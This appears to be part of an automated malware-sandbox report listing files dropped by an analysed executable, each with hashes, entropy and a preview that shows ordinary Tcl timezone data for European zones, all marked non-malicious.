                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.876296755647751
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQahs3QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/y72
                                                                                                                                                                                                                              MD5:7160C6EE32380846653F016AE8AFD52A
                                                                                                                                                                                                                              SHA1:DE7805089639C54893F2107FA67342DA72A79BBC
                                                                                                                                                                                                                              SHA-256:557023674F6E8376707517103EE69C1DEBBE53CDD4BCAB11E763CC53B9CB1908
                                                                                                                                                                                                                              SHA-512:FDBDECBBDB0C419226E2604608FD2923CFB06E4B6948493208FD83FD796880E81F6147C0FAFEB572079C9C916831B7B055620EC939164CCA1DAF76897BE60F2C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Belfast) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7309
                                                                                                                                                                                                                              Entropy (8bit):3.8204712502914653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:lp+/4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:lY41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:02A003411B61A311896A6407B622152A
                                                                                                                                                                                                                              SHA1:3B8BC6D1AF698CE7BB14A08307F5A4295EB8ED03
                                                                                                                                                                                                                              SHA-256:74B225511B518B0CED972CBB33D694697712CCB96A6D81E0F50ADA28CF6E2C92
                                                                                                                                                                                                                              SHA-512:9E03B3EB1E528E5B1ADBA09F808E73BF9C4314EDCBF6F96E46844D51A5F425BED3EE8FD5BA8706C46A7FB9882485F119F81996F2EAB7E1E9B598978C402DDE0F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Belgrade) {.. {-9223372036854775808 4920 0 LMT}.. {-2713915320 3600 0 CET}.. {-905824800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-777942000 7200 1 CEST}.. {-766623600 3600 0 CET}.. {407199600 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 360
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8020
                                                                                                                                                                                                                              Entropy (8bit):3.820756136386754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Pi9+qFR274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:PQs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:84027C3C8315BD479B38DE11F38E873F
                                                                                                                                                                                                                              SHA1:6E92A2A9734A9C6B02ECCD99F114D667C909C5BA
                                                                                                                                                                                                                              SHA-256:7E7111F06288069B52A4E1CA0B016216DF9328FB3B1560A740146497CCDD4D24
                                                                                                                                                                                                                              SHA-512:5FFDE523021FC0C490261F55999204C9CE6C8C274888525EA6EE7C01BC5CCABC7A3877FD454B4167D81F4B89BACB087E8BA6AB0BAC46C2874ED9257BE2092340
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Berlin) {.. {-9223372036854775808 3208 0 LMT}.. {-2422054408 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-776559600 10800 0 CEMT}.. {-765936000 7200 1 CEST}.. {-761180400 3600 0 CET}.. {-757386000 3600 0 CET}.. {-748479600 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-717631200 7200 1 CEST}.. {-714610800 10800 1 CEMT}.. {-710380800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {315529200 3600 0 CET}.. {323830800 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.943205109348136
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVtXrAeovXHAIgoquXrsY6RL/yQahcvEB5yQazXrH:SlSWB9vsM3ymzbAeSHAIgozbsY6N/y7c
                                                                                                                                                                                                                              MD5:C69AB60BE74D4BB7E31BE4E5ECCD8FD2
                                                                                                                                                                                                                              SHA1:9DD0BA6171080F074858EF88ADA2E91C1F465619
                                                                                                                                                                                                                              SHA-256:1D7C539AAA1E3AD5EF3574A629523B5B781F1A91D352C9B39B8DE7316756026E
                                                                                                                                                                                                                              SHA-512:C273B97CCFB5F328EB7A13CCA3126DE8D91B3876CBD248990C0BE063DDBE5B0F31EA138E31A1C5C43B1ABCF42EA511448E6DC589EB99E8172D7C2A68BA31A8E7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Prague)]} {.. LoadTimeZoneFile Europe/Prague..}..set TZData(:Europe/Bratislava) $TZData(:Europe/Prague)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9223
                                                                                                                                                                                                                              Entropy (8bit):3.8450929464870804
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:RhcSQnG1Czyc1+FdDKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcM:Rh8zyc4Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:E6C1153C3F71C8C005D7A46DDF6461FB
                                                                                                                                                                                                                              SHA1:CBDF7D5D36AF57D83859C910B493464617EC9571
                                                                                                                                                                                                                              SHA-256:1402A2072ADC9EBB35F4C0368D2E9A7A11493626C667C022614FFB7CC05B6CB6
                                                                                                                                                                                                                              SHA-512:8B1B47678F75DBE59DB08E034F0701BD11FF4FD3AD0304C8ABF45E848F717D2787B8E47558D3C334D369E0938C633DC217178D3EAE6486CEFBE25CF1668479F6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Brussels) {.. {-9223372036854775808 1050 0 LMT}.. {-2840141850 1050 0 BMT}.. {-2450995200 0 0 WET}.. {-1740355200 3600 0 CET}.. {-1693702800 7200 0 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1613826000 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585530000 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1520557200 0 0 WET}.. {-1507510800 3600 1 WEST}.. {-1490576400 0 0 WET}.. {-1473642000 3600 1 WEST}.. {-1459126800 0 0 WET}.. {-1444006800 3600 1 WEST}.. {-1427677200 0 0 WET}.. {-1411952400 3600 1 WEST}.. {-1396227600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301263200 0 0 WET}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7974
                                                                                                                                                                                                                              Entropy (8bit):3.7264631277913853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vMSsQMAz5CXNU5paNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:vMS1kdUoivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:88DB5686937D3499A8142413B2CF2EB5
                                                                                                                                                                                                                              SHA1:E37BAD2127553600D0E38A43053D1B07B2498DA8
                                                                                                                                                                                                                              SHA-256:C560D45104A8DD73FC7370B5AC1615E22043DBC93DFB46A9ECC6468C2D38B19A
                                                                                                                                                                                                                              SHA-512:375B8A63CFF2E278CD8C78BF9DBC86288FFB1AD57DAED00CD2199F0B05F4FBFA7D17D93C6458B20B86F6D05F3E3A49D594E60AC97DDB47141E21D7CDE10F8456
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Bucharest) {.. {-9223372036854775808 6264 0 LMT}.. {-2469404664 6264 0 BMT}.. {-1213148664 7200 0 EET}.. {-1187056800 10800 1 EEST}.. {-1175479200 7200 0 EET}.. {-1159754400 10800 1 EEST}.. {-1144029600 7200 0 EET}.. {-1127700000 10800 1 EEST}.. {-1111975200 7200 0 EET}.. {-1096250400 10800 1 EEST}.. {-1080525600 7200 0 EET}.. {-1064800800 10800 1 EEST}.. {-1049076000 7200 0 EET}.. {-1033351200 10800 1 EEST}.. {-1017626400 7200 0 EET}.. {-1001901600 10800 1 EEST}.. {-986176800 7200 0 EET}.. {-970452000 10800 1 EEST}.. {-954727200 7200 0 EET}.. {296604000 10800 1 EEST}.. {307486800 7200 0 EET}.. {323816400 10800 1 EEST}.. {338940000 7200 0 EET}.. {354672000 10800 0 EEST}.. {370396800 7200 0 EET}.. {386121600 10800 1 EEST}.. {401846400 7200 0 EET}.. {417571200 10800 1 EEST}.. {433296000 7200 0 EET}.. {449020800 10800 1 EEST}.. {465
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8287
                                                                                                                                                                                                                              Entropy (8bit):3.8244305880244567
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:rHw0+D5xp4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:rQXj41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:11468F958796F971ADD5FB1A0C426D78
                                                                                                                                                                                                                              SHA1:3FA58BEF391BCF7BAC6A124D093B6505B4EAC452
                                                                                                                                                                                                                              SHA-256:B58F3E9066B8B57EB037D509636AA67A06ACC8348BE6C48482D87CDC49844A4E
                                                                                                                                                                                                                              SHA-512:0492EABD6EE16392C00A196AF38995E5F9E55E30A82A50EFFB381DC978E9E63E801555CDC219869E6251BD51115972F742D8A7D9524372B8B11702AE4B28BFB7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Budapest) {.. {-9223372036854775808 4580 0 LMT}.. {-2498260580 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1640998800 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1600470000 7200 1 CEST}.. {-1587250800 3600 0 CET}.. {-1569711600 7200 1 CEST}.. {-1555196400 3600 0 CET}.. {-906775200 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-778471200 7200 1 CEST}.. {-762656400 3600 0 CET}.. {-749689200 7200 1 CEST}.. {-733276800 3600 0 CET}.. {-717634800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-686185200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {-492656400 7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.952483060656419
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVnCMPfXHAIgoqkCM4ARL/yQahDZALMFB5h8Qa5CMS:SlSWB9vsM3ym5XPHAIgo5gAN/y7D17/f
                                                                                                                                                                                                                              MD5:CED145F8D9B231234E021D2214C1064B
                                                                                                                                                                                                                              SHA1:7B111DC24CA01C78A382CECD3247CF495D71CD34
                                                                                                                                                                                                                              SHA-256:F511A80AB70FF93A0EB9F29293F73DF952B773BB33EB85D581E4FB1FE06E4F05
                                                                                                                                                                                                                              SHA-512:E2323C04BF99909ABA9A09A66F9B4696519B5F9FE3AF178FB04D5E0053F41CAA8B937DC4148954ED093D317F454E0547786BEC934F2ABF22A60AAA6A24E63BF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Zurich)]} {.. LoadTimeZoneFile Europe/Zurich..}..set TZData(:Europe/Busingen) $TZData(:Europe/Zurich)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8096
                                                                                                                                                                                                                              Entropy (8bit):3.7635458172251406
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:jXSsijEpkv2XkN8qc/OyEie8hF5WQ9VX/Zs1cw27oXqdCA5XqjqFLigTE9s5VpJ:jXS+WeUqKie8hF5f9PwdXM9
                                                                                                                                                                                                                              MD5:E7F52393523729CA3916768B3F3B4E55
                                                                                                                                                                                                                              SHA1:1524A3E610DCD33AC0006946BAB2929CA7F5A33F
                                                                                                                                                                                                                              SHA-256:2BD1C0AB412A5E9C97F533C4D06B773D045215B92568A4E89ADC93C7462D62EC
                                                                                                                                                                                                                              SHA-512:218674ECD9FD6C1A1C83EE69AFE6AA5AD0D5A8BB59FF497FDF2573B7CF52DAE98ECE0815CF99668CA4E172FF67D220B227369865076333B3EE802A8839C65279
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Chisinau) {.. {-9223372036854775808 6920 0 LMT}.. {-2840147720 6900 0 CMT}.. {-1637114100 6264 0 BMT}.. {-1213148664 7200 0 EET}.. {-1187056800 10800 1 EEST}.. {-1175479200 7200 0 EET}.. {-1159754400 10800 1 EEST}.. {-1144029600 7200 0 EET}.. {-1127700000 10800 1 EEST}.. {-1111975200 7200 0 EET}.. {-1096250400 10800 1 EEST}.. {-1080525600 7200 0 EET}.. {-1064800800 10800 1 EEST}.. {-1049076000 7200 0 EET}.. {-1033351200 10800 1 EEST}.. {-1017626400 7200 0 EET}.. {-1001901600 10800 1 EEST}.. {-986176800 7200 0 EET}.. {-970452000 10800 1 EEST}.. {-954727200 7200 0 EET}.. {-927165600 10800 1 EEST}.. {-898138800 7200 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-800154000 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.925156646979837
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQagKVihh8Qahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yy87Fv
                                                                                                                                                                                                                              MD5:3AEDE4B340D0250D496C49CADBA04E62
                                                                                                                                                                                                                              SHA1:C466D8275C465752F5B024615268F6D1CBBA4B41
                                                                                                                                                                                                                              SHA-256:2B9A0F1775355E311FB63903E3829F98B5F6C73C08F1BECE1A2D471ACC2673E3
                                                                                                                                                                                                                              SHA-512:2B08B57D58699C65A9AAA43AC87F29DD1EDCBA9F91E79DF4B1E07832032F5B03A43847E20345484730E8D2323199E7439D8C1FC662E812E8BA6EE19C53C89681
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Copenhagen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9810
                                                                                                                                                                                                                              Entropy (8bit):3.7678769652077873
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:sExxHZiMU8EKTy74jT56XdEN1+UZBdMN186LPR:sEzZiMUZ6y0jT5bZHMN186LPR
                                                                                                                                                                                                                              MD5:E1EB426EA3351AF0D7D563006F9146BC
                                                                                                                                                                                                                              SHA1:1E94F3B38366FE43BB031A57D19894B569EBABED
                                                                                                                                                                                                                              SHA-256:895957521D6CA4DE7E4089DC587A6C177B803D8ADF63303B1F85DEB279726324
                                                                                                                                                                                                                              SHA-512:8F24E9519F5D42F34AEE5C52A94CAC7D035EAE7B31DC3E629C29CFE3BD85F1510188290D35CD327492A030168443FED8BD80EC57ED27811B786C4DC89B4B1181
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Dublin) {.. {-9223372036854775808 -1521 0 LMT}.. {-2821649679 -1521 0 DMT}.. {-1691962479 2079 1 IST}.. {-1680471279 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1517011200 0 0 IST}.. {-1507500000 3600 1 IST}.. {-1490565600 0 0 IST}.. {-1473631200 3600 1 IST}.. {-1460930400 0 0 IST}.. {-1442786400 3600 1 IST}.. {-1428876000 0 0 IST}.. {-1410732000 3600 1 IST}.. {-1396216800 0 0 IST}.. {-1379282400 3600 1 IST}.. {-1364767200 0 0 IST}.. {-1348437600 3600 1 IST}.. {-1333317600 0 0 IST}.. {-1315778400 3600 1 IST}.. {-1301263200 0 0 IST}.. {-1284328800 3600 1 IST}.. {-1269813600 0 0 IST}.. {-1253484000 3600 1 IST
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9509
                                                                                                                                                                                                                              Entropy (8bit):3.8837074152297704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QTOKVA1oCobz0W4x2+ZE74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNA:QyoCvTZ641sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:D04F8EDDA1C3611692FB91E317CCADFE
                                                                                                                                                                                                                              SHA1:1C483FC95459EC6F1D5FE4DD275879A9EBCA1718
                                                                                                                                                                                                                              SHA-256:0524A31131405347C1D5D86C5EE38A2064AB055C030AB3B43F25DB3B28FFD8D2
                                                                                                                                                                                                                              SHA-512:4E2E18EBDE2765F2251B1FE41EF8E6AC79875617348974A28619F5E59EC0467239C682CCE8DEBD7A698BE2F00252C77D1F7FA50B6CAFF920B3BE53A0B836F815
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Gibraltar) {.. {-9223372036854775808 -1284 0 LMT}.. {-2821649916 0 0 GMT}.. {-1691964000 3600 1 BST}.. {-1680472800 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1507500000 3600 1 BST}.. {-1490565600 0 0 GMT}.. {-1473631200 3600 1 BST}.. {-1460930400 0 0 GMT}.. {-1442786400 3600 1 BST}.. {-1428876000 0 0 GMT}.. {-1410732000 3600 1 BST}.. {-1396216800 0 0 GMT}.. {-1379282400 3600 1 BST}.. {-1364767200 0 0 GMT}.. {-1348437600 3600 1 BST}.. {-1333317600 0 0 GMT}.. {-1315778400 3600 1 BST}.. {-1301263200 0 0 GMT}.. {-1284328800 3600 1 BST}.. {-1269813600 0 0 GMT}.. {-1253484000 3600 1 BST}.. {-1238364000 0 0 GMT}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.879252060643389
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQakQAL/yQavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/yYU
                                                                                                                                                                                                                              MD5:07AF23DA01CB963EA9E57534E34E7704
                                                                                                                                                                                                                              SHA1:1C4A214FF3B722E80C0ECACA0FFD5DFF302F6AE9
                                                                                                                                                                                                                              SHA-256:F7046808A8E80B7AE449D1A49AE3E480096736B7D3F554A240C7DFB10F82076A
                                                                                                                                                                                                                              SHA-512:713860D340C0EBA5EEF873ECB9B28CCDE9BFAD31B6A8626EF507E96585F5CC1091BF8D8A2DB7E5CB532E44F4561FBAE1797141724EF934755B69919FEA09A78A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Guernsey) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7368
                                                                                                                                                                                                                              Entropy (8bit):3.7258352536809705
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:OsR0uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0hzj:OkyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:7FF902B06FA79F14553670A70E77FF8C
                                                                                                                                                                                                                              SHA1:0105051541F38956EA6192BD0C7ED4047668005E
                                                                                                                                                                                                                              SHA-256:5B5C0A9261A414EA8DC34F594EE05BEE16F695488B230857D2B569A6B603BC39
                                                                                                                                                                                                                              SHA-512:551940199783A0FF9D73695B77B10300644F50E91D6B02FE79BB0CD4B78C7BA88CCE56F4B9408EC146361BF408F52D01A1F435183360C801EA5E219FB718247F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Helsinki) {.. {-9223372036854775808 5989 0 LMT}.. {-2890258789 5989 0 HMT}.. {-1535938789 7200 0 EET}.. {-875671200 10800 1 EEST}.. {-859773600 7200 0 EET}.. {354672000 10800 1 EEST}.. {370396800 7200 0 EET}.. {386121600 10800 1 EEST}.. {401846400 7200 0 EET}.. {410220000 7200 0 EET}.. {417574800 10800 1 EEST}.. {433299600 7200 0 EET}.. {449024400 10800 1 EEST}.. {465354000 7200 0 EET}.. {481078800 10800 1 EEST}.. {496803600 7200 0 EET}.. {512528400 10800 1 EEST}.. {528253200 7200 0 EET}.. {543978000 10800 1 EEST}.. {559702800 7200 0 EET}.. {575427600 10800 1 EEST}.. {591152400 7200 0 EET}.. {606877200 10800 1 EEST}.. {622602000 7200 0 EET}.. {638326800 10800 1 EEST}.. {654656400 7200 0 EET}.. {670381200 10800 1 EEST}.. {686106000 7200 0 EET}.. {701830800 10800 1 EEST}.. {717555600 7200 0 EET}.. {733280400 10800 1 EEST}.. {749
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.914274131294981
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQaqpfioxp8QavKLS:SlSWB9vsM3ymvKA2PHAIgovKAH6N/ycS
                                                                                                                                                                                                                              MD5:F9A0F19FAF3131D8A70C50FF21B365B7
                                                                                                                                                                                                                              SHA1:7FC2B5302FAD06BC4C633CD22A80A7D40073FFF8
                                                                                                                                                                                                                              SHA-256:2F1151B0528A5325443379D4E7CCE32C00213722AD9DF764E1DC90198084B076
                                                                                                                                                                                                                              SHA-512:6D04DF4480FE132A6641C4BF7E01936E2E4A71A3A6C2AB9F7DA7A9D8A4B836BC66EE2BB597B8C318D07A06F72C05B07E6785B53308ED9BC1103AE6DBDD0FF24E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Isle_of_Man) $TZData(:Europe/London)..
